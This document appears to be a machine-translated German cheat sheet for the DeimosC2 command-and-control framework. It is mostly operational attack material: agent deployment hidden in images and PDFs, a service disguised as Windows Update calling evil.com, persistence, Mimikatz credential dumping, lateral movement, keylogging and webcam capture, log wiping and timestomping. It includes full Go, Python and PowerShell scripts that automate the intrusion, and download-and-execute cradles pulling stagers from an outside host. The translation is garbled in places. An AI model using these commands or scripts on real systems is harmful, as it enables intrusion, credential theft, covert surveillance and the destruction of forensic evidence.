DeimosC2 Framework Cheat Sheet
Überblick
DeimosC2 ist ein Golang-basiertes Post-Exploitation-Befehls- und Kontrollgerüst für rote Team-Operationen und Penetrationstests. DeimosC2 ist mit modernen Architekturprinzipien aufgebaut und konzentriert sich auf die plattformübergreifende Kompatibilität, sichere Kommunikation und umfassende Nachbeschaffungsmöglichkeiten bei gleichzeitiger Aufrechterhaltung eines leichten Fußabdrucks und fortschrittlicher Evasionstechniken.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install Go 1.18+ and Git
sudo apt update sudo apt install -y golang-go git build-essential
Verify Go installation
go version
Set Go environment variables
export GOPATH=$HOME/go export PATH=$PATH:$GOPATH/bin echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc ```_
Installation von GitHub
```bash
Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git cd DeimosC2
Build the server
go mod tidy go build -o deimosc2-server ./cmd/server
Build the agent
go build -o deimosc2-agent ./cmd/agent
Make executables
chmod +x deimosc2-server deimosc2-agent ```_
Docker Installation
```bash
Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git cd DeimosC2
Build Docker image
docker build -t deimosc2 .
Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2 ```_
Cross-Platform Compilation
```bash
Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agent ```_
Basisnutzung
Start des Servers
```bash
Start DeimosC2 server with default settings
./deimosc2-server
Start with custom configuration
./deimosc2-server -config config.json
Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080
Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key
Start in debug mode
./deimosc2-server -debug ```_
Datei konfigurieren
json
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}_
Web Interface Zugriff
```bash
Access DeimosC2 web interface
http://localhost:8080
HTTPS access
https://your-domain.com:443
Default credentials (configurable)
Username: admin Password: SecurePassword123! ```_
Agent Deployment
Grundlegende Ausführung des Agenten
```bash
Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080
Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080
macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080
Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20 ```_
Agent Configuration Optionen
```bash
Command line options
./deimosc2-agent -h
Options: -server string C2 server URL (required) -interval int Check-in interval in seconds (default: 30) -jitter int Jitter percentage (default: 10) -user-agent string Custom User-Agent string -proxy string Proxy URL (http://proxy:port) -cert string Custom CA certificate file -insecure Skip TLS certificate verification -debug Enable debug logging ```_
Steganographische Bereitstellung
```bash
Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg
Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe ./agent.exe -server http://192.168.1.100:8080
Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdf ```_
Service Installation (Windows)
```bash
Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto sc start "DeimosAgent"
Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service" ```_
Befehl und Kontrolle
Personalmanagement
```bash
List active agents
agents list
Get agent information
agents info [agent_id]
Execute command on agent
agents exec [agent_id] "whoami"
Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"
Kill agent
agents kill [agent_id]
Rename agent
agents rename [agent_id] [new_name] ```_
Dateioperationen
```bash
Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
List directory contents
ls [agent_id] C:\Users\Administrator\Documents
Change directory
cd [agent_id] C:\Windows\System32
Create directory
mkdir [agent_id] C:\Windows\Temp\data
Remove file
rm [agent_id] C:\Windows\Temp\payload.exe ```_
Prozessmanagement
```bash
List processes
ps [agent_id]
Kill process
kill [agent_id] [pid]
Start process
start [agent_id] notepad.exe
Process injection
inject [agent_id] [pid] [shellcode_file]
Memory dump
memdump [agent_id] [pid] output.dmp ```_
Netzwerkaktivitäten
```bash
Network discovery
discover [agent_id] 192.168.1.0/24
Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389
ARP scan
arpscan [agent_id] 192.168.1.0/24
Network interfaces
ifconfig [agent_id]
Routing table
route [agent_id]
Network connections
netstat [agent_id] ```_
Erweiterte Funktionen
Persistenzmechanismen
```bash
Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"
Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"
LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent" ```_
Vorrechte Eskalation
```bash
UAC bypass (Windows)
elevate uac [agent_id] [payload_path]
Token manipulation (Windows)
elevate token [agent_id] [target_pid]
Sudo exploitation (Linux)
elevate sudo [agent_id] [command]
SUID exploitation (Linux)
elevate suid [agent_id]
Kernel exploits
elevate kernel [agent_id] [exploit_name] ```_
Spätere Bewegung
```bash
WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\" ```_
Einrichtende Operationen
```bash
Dump credentials (Windows)
creds dump [agent_id]
Mimikatz execution (Windows)
creds mimikatz [agent_id] "sekurlsa::logonpasswords"
SAM dump (Windows)
creds sam [agent_id]
LSA secrets (Windows)
creds lsa [agent_id]
Browser credentials
creds browser [agent_id]
SSH keys (Linux/macOS)
creds ssh [agent_id]
Keychain dump (macOS)
creds keychain [agent_id] ```_
Pivoting und Tunneling
```bash
SOCKS proxy
pivot socks [agent_id] 1080
Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80
Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
HTTP tunnel
pivot http [agent_id] 8080
DNS tunnel
pivot dns [agent_id] tunnel.example.com ```_
Datenerhebung
```bash
Screenshot
screenshot [agent_id]
Keylogger
keylog start [agent_id] keylog stop [agent_id] keylog dump [agent_id]
Webcam capture
webcam [agent_id]
Microphone recording
microphone [agent_id] 60
Clipboard monitoring
clipboard [agent_id]
File search
search [agent_id] C:\Users *.docx
Registry search
regsearch [agent_id] HKLM password ```_
Automatisierung und Schrift
Go Automation Script
```go package main
import ( "bytes" "encoding/json" "fmt" "io/ioutil" "net/http" "time" )
type DeimosClient struct \\{ BaseURL string Username string Password string HTTPClient *http.Client Token string \\}
type Agent struct \\{
ID string json:"id"
Hostname string json:"hostname"
Username string json:"username"
OS string json:"os"
IP string json:"ip"
Status string json:"status"
\\}
type Command struct \\{
AgentID string json:"agent_id"
Command string json:"command"
Args string json:"args"
\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\{ return &DeimosClient;\\{ BaseURL: baseURL, Username: username, Password: password, HTTPClient: &http;.Client\\{Timeout: 30 * time.Second\\}, \\} \\}
func (c *DeimosClient) Authenticate() error \\{ authData := map[string]string\\{ "username": c.Username, "password": c.Password, \\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result;)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")
\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\{ req, _ := http.NewRequest("GET", c.BaseURL+"/api/agents", nil) req.Header.Set("Authorization", "Bearer "+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents;)
return agents, nil
\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\{ cmdData := Command\\{ AgentID: agentID, Command: command, \\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\{ commands := []string\\{ "whoami", "hostname", "pwd", "ps", "ifconfig", "netstat -an", "uname -a", \\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}
\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\{ persistenceCommands := []string\\{ "persist registry HKCU \"Software\Microsoft\Windows\CurrentVersion\Run\" \"WindowsUpdate\" \"C:\Windows\Temp\agent.exe\"", "persist schtask \"SystemUpdate\" \"C:\Windows\Temp\agent.exe\" \"ONLOGON\"", "persist service \"WindowsUpdateService\" \"C:\Windows\Temp\agent.exe\"", \\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}
\\}
func main() \\{ client := NewDeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}
\\} ```_
Python Automation Script
```python
!/usr/bin/env python3
DeimosC2 Python automation script
import requests import json import time from urllib3.exceptions import InsecureRequestWarning
Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient: def init(self, base_url, username, password): self.base_url = base_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def main(): client = DeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)
if name == "main": main() ```_
PowerShell Automation
```powershell
DeimosC2 PowerShell automation script
function Invoke-DeimosAutomation \\{ param( [string]$ServerURL = "http://192.168.1.100:8080", [string]$Username = "admin", [string]$Password = "SecurePassword123!" )
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\}
Execute automation
Invoke-DeimosAutomation ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use DeimosC2 for initial access, pivot to Metasploit
Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"
Handle in Metasploit
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt
```bash
Generate Empire stager
Use DeimosC2 for initial access, pivot to Empire
From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration
```bash
Beacon integration
Generate Cobalt Strike beacon
Use DeimosC2 for initial access, pivot to Beacon
From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server
```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Use HTTPS with valid certificates
Configure domain fronting
Implement certificate pinning
Use legitimate user agents
Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.key ```_
Verkehrsobfukation
```bash
Use custom user agents
Implement jitter and delays
Mimic legitimate traffic patterns
Use common ports and protocols
Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30 ```_
Anti-Forensik
```bash
Clear event logs
agents exec [agent_id] "wevtutil cl System" agents exec [agent_id] "wevtutil cl Security" agents exec [agent_id] "wevtutil cl Application"
Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'" ```_
Fehlerbehebung
Gemeinsame Themen
```bash
Agent not connecting
- Check firewall rules
- Verify server configuration
- Test network connectivity
- Check certificate issues
Go build issues
go mod tidy go clean -cache
SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes ```_
Debug Mode
```bash
Enable debug logging
./deimosc2-server -debug
Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080
Check network connectivity
telnet 192.168.1.100 8080 ```_
Best Practices
Betriebsplanung
- *Pre-engagement Setup: Server und Kompile Agenten vor dem Eingriff konfigurieren
- Agent Management: Deskriptive Agentennamen verwenden und durch Netzwerk organisieren
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- *Cleanup-Verfahren: Plan zur Artefaktentfernung und Wirkstoffreinigung
Sicherheitsüberlegungen
```bash
Secure deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Agent management
Use unique agent identifiers
Implement agent timeouts
Regular agent rotation
Secure communication channels
```_
Dokumentation und Reporting
```bash
Operation documentation
Maintain agent logs
Document all activities
Track compromised systems
Generate executive reports
Artifact tracking
Monitor IOCs
Document forensic artifacts
Implement attribution prevention
```_
Ressourcen
- DeimosC2 GitHub Repository
- DeimosC2 Dokumentation
- Go Programming Language
- [MITRE ATT&CK; Framework](LINK_5___ -%20(SANS%20Red%20Team%20Operations)(__LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von DeimosC2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *